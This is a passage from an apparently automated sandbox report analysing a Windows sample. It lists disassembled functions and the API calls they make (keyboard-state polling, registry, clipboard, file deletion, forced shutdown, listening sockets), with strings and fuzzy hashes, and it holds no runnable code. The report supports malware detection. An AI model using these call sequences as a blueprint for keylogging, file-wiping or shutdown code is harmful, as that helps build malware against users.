AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D7DB1
GetLengthSid.ADVAPI32(?), ref: 009D7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D7DDD
HeapAlloc.KERNEL32(00000000), ref: 009D7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D7E05
CopySid.ADVAPI32(00000000), ref: 009D7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D7E77

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
Instruction ID: 2472fc386ef4169045ba8648520f3f3d3d9c1d4ab64e151527e256c0cf74c447
Opcode Fuzzy Hash: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
Instruction Fuzzy Hash: 57613E71944209AFDF10DF94DC85AEEBB79FF44300F04816AE915A6392EB319A16CB60

Function 009966E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CRLF), xrefs: 009D12C1
LIMIT_MATCH=, xrefs: 009D1170
UCP), xrefs: 009D110D
ANYCRLF), xrefs: 009D12FB
BSR_ANYCRLF), xrefs: 009D131E
UTF), xrefs: 009D10FA
NO_START_OPT), xrefs: 009D114F
LIMIT_RECURSION=, xrefs: 009D11FC
NO_AUTO_POSSESS), xrefs: 009D112E
CR), xrefs: 009D1287
ANY), xrefs: 009D12DE
UTF16), xrefs: 009D10CF
LF), xrefs: 009D12A4
BSR_UNICODE), xrefs: 009D1338

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 56fc43d7e6af1e4c8b8cc74a6df1994bff08d7c85d0956ebfc3d177d65097a88
Instruction ID: 7861a40aa62ba646e6341d933f736583900bd72f7f3ba270fc74548b4b9ad977
Opcode Fuzzy Hash: 56fc43d7e6af1e4c8b8cc74a6df1994bff08d7c85d0956ebfc3d177d65097a88
Instruction Fuzzy Hash: 5F726F76E042199BDF24CF59D8807AEB7B5FF48310F14816AE949EB390E7749981CB90

Function 009E001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009E0097
SetKeyboardState.USER32(?), ref: 009E0102
GetAsyncKeyState.USER32(000000A0), ref: 009E0122
GetKeyState.USER32(000000A0), ref: 009E0139
GetAsyncKeyState.USER32(000000A1), ref: 009E0168
GetKeyState.USER32(000000A1), ref: 009E0179
GetAsyncKeyState.USER32(00000011), ref: 009E01A5
GetKeyState.USER32(00000011), ref: 009E01B3
GetAsyncKeyState.USER32(00000012), ref: 009E01DC
GetKeyState.USER32(00000012), ref: 009E01EA
GetAsyncKeyState.USER32(0000005B), ref: 009E0213
GetKeyState.USER32(0000005B), ref: 009E0221

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
Instruction ID: f0f243c5b54d7a0a1d62f47d933778718f1e452b3a89651172152bde1fc630df
Opcode Fuzzy Hash: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
Instruction Fuzzy Hash: 04519A209047C829FB36DBB188557EABFB89F81380F08459A95C65A5C3DAE49FCCC761

Function 00A003DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A004AC

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A0054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A005E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A00822
RegCloseKey.ADVAPI32(00000000), ref: 00A0082F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b7b33ab862dd96aa03e266c170c956a0843625c9d9ec54c5132dea4c35b5e379
Instruction ID: 31c35b0f9a5de6d17f95dabcedc46374ce76a70f8d61a0f047d0b7b65c0b8e27
Opcode Fuzzy Hash: b7b33ab862dd96aa03e266c170c956a0843625c9d9ec54c5132dea4c35b5e379
Instruction Fuzzy Hash: EDE14D71204204AFCB14DF68D895E6ABBE5FF89314F04856DF84ADB2A1DB31ED05CB92

Function 009F4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009F418B
EmptyClipboard.USER32 ref: 009F4191
GlobalAlloc.KERNEL32(00000002,?), ref: 009F41A6
CloseClipboard.USER32 ref: 009F4245

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d1dcd2732f0709a1341eb14f11909c01456b89f814fa552d1c097112866aad01
Instruction ID: 17b0740d133bd15185f5dec897ad63cb3e1800bcd31c8873391d6719cf651803
Opcode Fuzzy Hash: d1dcd2732f0709a1341eb14f11909c01456b89f814fa552d1c097112866aad01
Instruction Fuzzy Hash: 8E21B4356012189FDB10EF64DC19B7E7BA8EF55310F148026F946AB271CB71AC02CB84

Function 009E37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770

Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32

FindFirstFileW.KERNEL32(?,?), ref: 009E38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009E394B
MoveFileW.KERNEL32(?,?), ref: 009E395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009E397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 009E399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 009E39B9

Strings

\*.*, xrefs: 009E384E, 009E3857, 009E386C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 38cfcdbccf64c333fd2d2331667ef05d1ced3f365aff275a4deb1127cbfa315e
Instruction ID: 53650cfafff2054194daaa4d40edcfc160de6b52e6c1d0087ed336fe3c388bca
Opcode Fuzzy Hash: 38cfcdbccf64c333fd2d2331667ef05d1ced3f365aff275a4deb1127cbfa315e
Instruction Fuzzy Hash: 4F517D3180518DEACF12FBE1D996AEDB779AF54310F604069E406B7292EB216F0DCB61

Function 009EF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009EF440
Sleep.KERNEL32(0000000A), ref: 009EF470
_wcscmp.LIBCMT ref: 009EF484
_wcscmp.LIBCMT ref: 009EF49F
FindNextFileW.KERNEL32(?,?), ref: 009EF53D
FindClose.KERNEL32(00000000), ref: 009EF553

Strings

*.*, xrefs: 009EF425

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
Instruction ID: 50fc6ac675242649ec2c438622b366c115433f462f4de9d957b345143a434107
Opcode Fuzzy Hash: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
Instruction Fuzzy Hash: 7F417B7190424AAFCF11EFA4DC59AEEBBB8FF55310F104466F815A3291EB309E49CB90

Function 00995760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009958A5
_memmove.LIBCMT ref: 009958F5
_memmove.LIBCMT ref: 0099595B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 29ec66a9ef162ad8bdd0aa701617c5b3e9dc372ba1e75417bcf3e98a4ee4f0f0
Instruction ID: a274b56c264af1ce8fa01417b17965fa974ac9511ed1dc745d187e606dab9ffc
Opcode Fuzzy Hash: 29ec66a9ef162ad8bdd0aa701617c5b3e9dc372ba1e75417bcf3e98a4ee4f0f0
Instruction Fuzzy Hash: 54126D70A00609DFDF04DFA9D985AEEB7F5FF88310F608529E446E7250EB36A915CB50

Function 009E3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770

Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32

FindFirstFileW.KERNEL32(?,?), ref: 009E3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 009E3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 009E3BEA
FindClose.KERNEL32(00000000), ref: 009E3C01
FindClose.KERNEL32(00000000), ref: 009E3C0A

Strings

\*.*, xrefs: 009E3B5B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 185e0207ff2c36e8a2e2fba56fdcd1dd1ae4dac86f6628028deaec42a076c590
Instruction ID: 5db6f6f766cac809ad9d127d6b4d3e67d2b5bbfe1f215acbac329131f52c58b8
Opcode Fuzzy Hash: 185e0207ff2c36e8a2e2fba56fdcd1dd1ae4dac86f6628028deaec42a076c590
Instruction Fuzzy Hash: C4314B71008385AFC601FF64D8959AFBBA8BE95314F444E2DF8D593291EB21DE09CB63

Function 009E51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865

ExitWindowsEx.USER32(?,00000000), ref: 009E51F9

Strings

, xrefs: 009E51E7
SeShutdownPrivilege, xrefs: 009E51C9
@, xrefs: 009E51EC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
Instruction ID: c333c794b8982b95ac4931be231ddaf02ca5d29687f699d66f12a2fdebf117a5
Opcode Fuzzy Hash: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
Instruction Fuzzy Hash: 330170357956466FF73A52659C8AFBB725CD708358F120821FA23E22C3D9501C018190

Function 009F6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009F62DC
WSAGetLastError.WSOCK32(00000000), ref: 009F62EB
bind.WSOCK32(00000000,?,00000010), ref: 009F6307
listen.WSOCK32(00000000,00000005), ref: 009F6316
WSAGetLastError.WSOCK32(00000000), ref: 009F6330
closesocket.WSOCK32(00000000,00000000), ref: 009F6344

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
Instruction ID: 773d2fac65c01014c0710c47ec3785a5b99c642bdf1ced4ee2159f6b90078e56
Opcode Fuzzy Hash: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
Instruction Fuzzy Hash: 9E21A0316002089FCB10EFA4CC45B7EB7A9EF88724F248159FA16A7391C770AD46CB51

Function 00995520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01

_memmove.LIBCMT ref: 009D0258
_memmove.LIBCMT ref: 009D036D
_memmove.LIBCMT ref: 009D0414

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: ed13a2aa8f111692d3e5be0f2487db67e153cb531123487c57024d9200bd08ed
Instruction ID: 35b169e46b8b9fc8796f0d7103344d16cc07198aa3dc92192e557289e88c0f42
Opcode Fuzzy Hash: ed13a2aa8f111692d3e5be0f2487db67e153cb531123487c57024d9200bd08ed
Instruction Fuzzy Hash: 1A02C270A00205DBCF04DFA8D981BAEBBB5FF85300F65846AE80ADB355EB35D951CB91

Function 00981287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,?,?,?,?), ref: 009819FA
GetSysColor.USER32(0000000F), ref: 00981A4E
SetBkColor.GDI32(?,00000000), ref: 00981A61

Part of subcall function 00981290: DefDlgProcW.USER32(?,00000020,?), ref: 009812D8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
Instruction ID: d3e3ce2a4489e55f6b66f4ffd25187a94a1280fee0aca60ecf082bcbc2a3e1eb
Opcode Fuzzy Hash: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
Instruction Fuzzy Hash: F4A14B71102548FFE72CBB28DD44EBF359CDB82365B140A1AF502D63E2DA699D0393B1

Function 009EBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009EBCE6
_wcscmp.LIBCMT ref: 009EBD16
_wcscmp.LIBCMT ref: 009EBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 009EBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 009EBD6C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 2f44e2181a310d1c64e8ef57cae97486ca1041b447fc5f3b4ef05d19ff3c215f
Instruction ID: 46242d4b9e936d4acd2a30cd374a908a513247b1b1305fa82a8c4416bfa99df4
Opcode Fuzzy Hash: 2f44e2181a310d1c64e8ef57cae97486ca1041b447fc5f3b4ef05d19ff3c215f
Instruction Fuzzy Hash: 9C51CE756046029FC715DF68D890EAAB3E8FF8A320F14461DF95A8B3A1DB30ED45CB91

Function 009F6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009F679E
WSAGetLastError.WSOCK32(00000000), ref: 009F67C7
bind.WSOCK32(00000000,?,00000010), ref: 009F6800
WSAGetLastError.WSOCK32(00000000), ref: 009F680D
closesocket.WSOCK32(00000000,00000000), ref: 009F6821

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
Instruction ID: 336d59ba67a1272f0d673117fdfdfbf4838dbd61df9150dcbbba3bc6c36803a9
Opcode Fuzzy Hash: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
Instruction Fuzzy Hash: D741A175A00214AFDB50FF648C86F7E77A8DF89714F48845CFA1AAB3D2CA74AD018791

Function 00A05376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A053C5
IsWindowEnabled.USER32 ref: 00A053D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00A053E0
IsIconic.USER32 ref: 00A053EE
IsZoomed.USER32 ref: 00A053FC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
Instruction ID: 5a35a0d6c1a61fab20b93eb9d00c8b6adeb30110a380b6ba407345bb09f3232d
Opcode Fuzzy Hash: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
Instruction Fuzzy Hash: 1411B631B009195FD731AF76EC54B6B7B99EF847A1B444029F846D7281CB70DC02CEA5

Function 009D80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
